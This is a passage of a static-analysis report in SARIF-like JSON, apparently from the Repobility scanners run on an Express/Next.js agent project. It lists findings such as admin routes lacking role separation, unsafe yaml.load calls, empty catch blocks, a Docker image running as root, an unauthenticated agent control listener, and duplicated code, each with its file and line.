10599, "scanner": "repobility-access-control", "fingerprint": "08d4cb7338ff235584b9da416f20e60b817e3cd18164cc116d2e1a340c209f29", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/pull", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2248|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2248}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /git/push."}, "properties": {"repobilityId": 10598, "scanner": "repobility-access-control", "fingerprint": "4ba1247657e5a6f0755963c4c11adbb123a2710e3743f8ae1b09ad7c70268ebb", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/push", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2225|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2225}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /git/commit."}, "properties": {"repobilityId": 10597, "scanner": "repobility-access-control", "fingerprint": "3f2dcbea658c27092124e05b2d06ac72d68b170f9177a22e30d321908265fc1e", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/commit", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2211|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2211}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /git/status."}, "properties": {"repobilityId": 10596, "scanner": "repobility-access-control", "fingerprint": "b6d69eb01cc1604baac494a69a35bdf05493ae5675253dfa6ee9a9ddcafbff48", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/status", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2200|cwe-285", "identity_targets": ["anonymous", "authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2200}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /backups."}, "properties": {"repobilityId": 10595, "scanner": "repobility-access-control", "fingerprint": "1b97050bd8f11a0dd7708b629f112fe2ecdc3d11280c36ae228174d20f7ebd57", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2146|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2146}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /backups."}, "properties": {"repobilityId": 10594, "scanner": "repobility-access-control", "fingerprint": "80ce5a4190f0a4f72a82258ff12863570af1b6fa8f865ac9867e9d5b21a704de", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2136|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2136}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /health."}, "properties": {"repobilityId": 10593, "scanner": "repobility-access-control", "fingerprint": "2d571c79d579bd8b85dd3c0ba040969e3ffe53fc57b2d5586b2f7694ce0564dd", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/health", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1091|cwe-285", "identity_targets": ["anonymous", "authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1091}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /gh-check/verify-nonce."}, "properties": {"repobilityId": 10592, "scanner": "repobility-access-control", "fingerprint": "2687e6e20a7f1883f4cabb771d995e2fa95462ece9322d6a0206e623b5e4515e", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/gh-check/verify-nonce", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|token|245|cwe-285", "identity_targets": ["authenticated", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/worktreeRoutes.ts"}, "region": {"startLine": 245}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /worktrees/resolve."}, "properties": {"repobilityId": 10591, "scanner": "repobility-access-control", "fingerprint": "b3436c6b997611223ae076b23e69c5d4c183c44451f026abf35167e6ff96d4fe", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/worktrees/resolve", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|token|108|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/worktreeRoutes.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "AUC002", "level": "warning", "message": {"text": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "properties": {"repobilityId": 10580, "scanner": "repobility-access-control", "fingerprint": "d495f45a32bb70be080c9fa6d59b9dbb88edf864ca255a9121ced3bec4d1581a", "category": "auth", "severity": "medium", "confidence": 0.74, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"scanner": "repobility-access-control", "endpoint_count": 489, "correlation_key": "fp|d495f45a32bb70be080c9fa6d59b9dbb88edf864ca255a9121ced3bec4d1581a", "auth_visible_percent": 22.5}}}, {"ruleId": "AUC001", "level": "warning", "message": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"repobilityId": 10579, "scanner": "repobility-access-control", "fingerprint": "f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10", "category": "auth", "severity": "medium", "confidence": 0.92, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"scanner": "repobility-access-control", "frameworks": ["Express", "Next.js"], "expected_files": [".repobility/access.yml", ".repobility/access.yaml", ".repobility/access.json", ".repobility/authorization.yml"], "correlation_key": "fp|f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10"}}}, {"ruleId": "DKR001", "level": "warning", "message": {"text": "Docker final stage has no non-root USER"}, "properties": {"repobilityId": 10577, "scanner": "repobility-docker", "fingerprint": "4306cac7c08e557fda9a3a460feb993f625449abce49233ecd9cca85fdb43bfa", "category": "docker", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "No USER directive was found in the final runtime stage.", "evidence": {"rule_id": "DKR001", "scanner": "repobility-docker", "final_base": "node:22-alpine", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|4306cac7c08e557fda9a3a460feb993f625449abce49233ecd9cca85fdb43bfa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile.relay"}, "region": {"startLine": 26}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10574, "scanner": "repobility-threat-engine", "fingerprint": "c9f832c5ebfe2b0d578e45eb4f3f19ff1018445419168d080eec871f9b4970d7", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|c9f832c5ebfe2b0d578e45eb4f3f19ff1018445419168d080eec871f9b4970d7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/messaging/WhatsAppAdapter.ts"}, "region": {"startLine": 329}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10573, "scanner": "repobility-threat-engine", "fingerprint": "681be3b7f8fe6ac8aa5407bd7b2b4b5cb4a7c0fe09f17d06d0a1d937ac189004", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|681be3b7f8fe6ac8aa5407bd7b2b4b5cb4a7c0fe09f17d06d0a1d937ac189004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/messaging/TelegramAdapter.ts"}, "region": {"startLine": 487}}}]}, {"ruleId": "ERR002", "level": "warning", "message": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "properties": {"repobilityId": 10572, "scanner": "repobility-threat-engine", "fingerprint": "d083d6f04f8b99b3fdf09466753084e86b0028756ba9cdbfae5a5dc27448a15c", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".catch(() => {})", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d083d6f04f8b99b3fdf09466753084e86b0028756ba9cdbfae5a5dc27448a15c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchExecutor.ts"}, "region": {"startLine": 373}}}]}, {"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code."}, "properties": {"repobilityId": 10571, "scanner": "repobility-threat-engine", "fingerprint": "b772fdd541d24199584fe81bab2b420a07860e137f5cf65fcd95f63d06c876e9", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|src/commands/jobmigrate.ts|110|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/commands/jobMigrate.ts"}, "region": {"startLine": 110}}}]}, {"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code."}, "properties": {"repobilityId": 10570, "scanner": "repobility-threat-engine", "fingerprint": "e0d7d5969e530c4126e28d2b3c7beee6d48e7aa2a1c604f2c514fd50e3d17aa9", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|token|715|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/scheduler/AgentMdJobLoader.ts"}, "region": {"startLine": 715}}}]}, {"ruleId": "SEC007", "level": "warning", "message": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code."}, "properties": {"repobilityId": 10569, "scanner": "repobility-threat-engine", "fingerprint": "4cea98390767a014c821ab6c690b663ad3c89e808eceb5c44af9904b134f0dac", "category": "deserialization", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "yaml.load(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC007", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|deserialization|token|151|sec007"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/scheduler/InstallBuiltinJobs.ts"}, "region": {"startLine": 151}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10566, "scanner": "repobility-threat-engine", "fingerprint": "3412c877b09b31cab080939f0cde1faeb526a407044ac1cc900f4409c890eb7a", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n        pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3412c877b09b31cab080939f0cde1faeb526a407044ac1cc900f4409c890eb7a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-failsafe.py"}, "region": {"startLine": 171}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10565, "scanner": "repobility-threat-engine", "fingerprint": "e85adf6332fe533d8d76173ccfb38ece32fd081688498da70bcafbc08728e87a", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n                pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|e85adf6332fe533d8d76173ccfb38ece32fd081688498da70bcafbc08728e87a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-retirement.py"}, "region": {"startLine": 169}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 10564, "scanner": "repobility-threat-engine", "fingerprint": "812a2910376167b1d1a49a07ac0f1b57249117e4396437720ce82b5900ab7013", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n            pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|812a2910376167b1d1a49a07ac0f1b57249117e4396437720ce82b5900ab7013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/build-state.py"}, "region": {"startLine": 192}}}]}, {"ruleId": "AGT012", "level": "warning", "message": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "properties": {"repobilityId": 10555, "scanner": "repobility-agent-runtime", "fingerprint": "8fa0ffa5769e25320a695e63d130e69318ebc8c6a41b5d6a81fa9c38b9d58006", "category": "quality", "severity": "medium", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File combines agent-control wording with an HTTP/SSE/WebSocket listener on an all-interface host and no visible auth guard.", "evidence": {"rule_id": "AGT012", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|8fa0ffa5769e25320a695e63d130e69318ebc8c6a41b5d6a81fa9c38b9d58006"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/FeedbackManager.ts"}, "region": {"startLine": 69}}}]}, {"ruleId": "AGT012", "level": "warning", "message": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "properties": {"repobilityId": 10554, "scanner": "repobility-agent-runtime", "fingerprint": "a856c8896aaf18e874c9f66d38b15c3c545492aa54ccaa9eb8f217e60b050b57", "category": "quality", "severity": "medium", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File combines agent-control wording with an HTTP/SSE/WebSocket listener on an all-interface host and no visible auth guard.", "evidence": {"rule_id": "AGT012", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|a856c8896aaf18e874c9f66d38b15c3c545492aa54ccaa9eb8f217e60b050b57"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchManager.ts"}, "region": {"startLine": 135}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 10553, "scanner": "repobility-agent-runtime", "fingerprint": "4c7215988540a4da7c1d34aeb83bf56f2885f5926440d34bc3f5e55621f75c85", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|4c7215988540a4da7c1d34aeb83bf56f2885f5926440d34bc3f5e55621f75c85"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "skills/instar-session/SKILL.md"}, "region": {"startLine": 48}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10552, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ad11323296de4bd1601fcd34fa65bf907af09b7a2b89ee213876cb17b8169ed6", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/monitoring/OrphanProcessReaper.ts", "duplicate_line": 403, "correlation_key": "fp|ad11323296de4bd1601fcd34fa65bf907af09b7a2b89ee213876cb17b8169ed6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/monitoring/SessionWatchdog.ts"}, "region": {"startLine": 499}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10551, "scanner": "repobility-ai-code-hygiene", "fingerprint": "52efad3c381200bd8e095b64b0356a10c600959f3ee0fd86847a475741131db1", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/config/LiveConfig.ts", "duplicate_line": 140, "correlation_key": "fp|52efad3c381200bd8e095b64b0356a10c600959f3ee0fd86847a475741131db1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/monitoring/CommitmentTracker.ts"}, "region": {"startLine": 837}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10550, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1ff31f2c36b90baf798c1feacc3b69eea3fc404d92c7cf42fd4bbb5a96cd5250", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/core/CoherenceReviewer.ts", "duplicate_line": 74, "correlation_key": "fp|1ff31f2c36b90baf798c1feacc3b69eea3fc404d92c7cf42fd4bbb5a96cd5250"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/reviewers/escalation-resolution.ts"}, "region": {"startLine": 86}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10549, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1ee5850fee271b892f6f0b6b98e7db6a0df82637abe4e844aff37ba51e2d6ae4", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/core/GlobalSecretStore.ts", "duplicate_line": 240, "correlation_key": "fp|1ee5850fee271b892f6f0b6b98e7db6a0df82637abe4e844aff37ba51e2d6ae4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/SecretStore.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10548, "scanner": "repobility-ai-code-hygiene", "fingerprint": "329e6354aba911af7e594068e429095ca2e362fc8dae93834dafb3b355dced03", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/core/AutoDispatcher.ts", "duplicate_line": 530, "correlation_key": "fp|329e6354aba911af7e594068e429095ca2e362fc8dae93834dafb3b355dced03"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/AutoUpdater.ts"}, "region": {"startLine": 437}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10547, "scanner": "repobility-ai-code-hygiene", "fingerprint": "559eb98837aacafdba3fe583266ad0e646a1fa5360c347191e0be643531c0655", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "playbook-scripts/playbook-migrate-lessons.py", "duplicate_line": 256, "correlation_key": "fp|559eb98837aacafdba3fe583266ad0e646a1fa5360c347191e0be643531c0655"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "playbook-scripts/playbook-offline-adapt.py"}, "region": {"startLine": 186}}}]}, {"ruleId": "AIC003", "level": "warning", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 10546, "scanner": "repobility-ai-code-hygiene", "fingerprint": "3dbba48291098ea987259f311e427b3ba66ae1b2e034214b120e8b71f6b7bd88", "category": "quality", "severity": "medium", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": ".instar/hooks/instar/claim-intercept-response.js", "duplicate_line": 7, "correlation_key": "fp|3dbba48291098ea987259f311e427b3ba66ae1b2e034214b120e8b71f6b7bd88"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".instar/hooks/instar/claim-intercept.js"}, "region": {"startLine": 7}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22097, "scanner": "repobility", "fingerprint": "4f9be3a9546f416ded860139ddce8281", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 43}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22096, "scanner": "repobility", "fingerprint": "3c5f4f4c2dfc12bd7d220229c7d92300", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22095, "scanner": "repobility", "fingerprint": "9018b85af7a9a366fe745e92e7c0b860", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-lifecycle.test.ts"}, "region": {"startLine": 32}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22094, "scanner": "repobility", "fingerprint": "b2279389b8e729dc462cd8e7aae48c29", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 46}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22093, "scanner": "repobility", "fingerprint": "22f54632b9566b5e3a9f9b6dbd93741f", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22092, "scanner": "repobility", "fingerprint": "372a493355e25e78d3ea7f163d8ad19a", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 32}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22091, "scanner": "repobility", "fingerprint": "7416699ca848b89882b442ff6f8a5f60", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 50}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22090, "scanner": "repobility", "fingerprint": "d17f106f6e68896e1d6c47ed31f2e2ed", "category": 